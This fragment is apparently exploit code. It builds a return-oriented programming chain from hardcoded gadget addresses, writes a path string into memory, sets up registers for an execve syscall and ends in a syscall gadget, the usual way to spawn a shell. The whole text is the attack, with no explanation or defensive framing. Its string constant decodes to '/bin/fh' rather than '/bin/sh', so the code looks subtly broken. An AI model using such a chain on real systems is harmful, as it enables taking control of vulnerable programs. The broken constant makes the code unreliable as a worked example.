payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x55c070)+p64(0x4c6f27)
# 0x00000000004c6f27: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4fa922)
# 0x4fa922: mov qword ptr [rdi], rax ; xor eax, eax ; pop rbp ; ret
payload += p64(0x0)+p64(0x4ef071)
# 0x00000000004ef071: pop rsi; xor eax, 0x8948fff1; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x55c070)+p64(0x4d829b)
# 0x00000000004d829b: pop rdx; ret; 
payload += p64(0x0)+p64(0x4c6f27)
# 0x00000000004c6f27: pop rax; ret; 
payload += p64(0x3b)+p64(0x467783)
# 0x0000000000467783: syscall; 
payload += b''
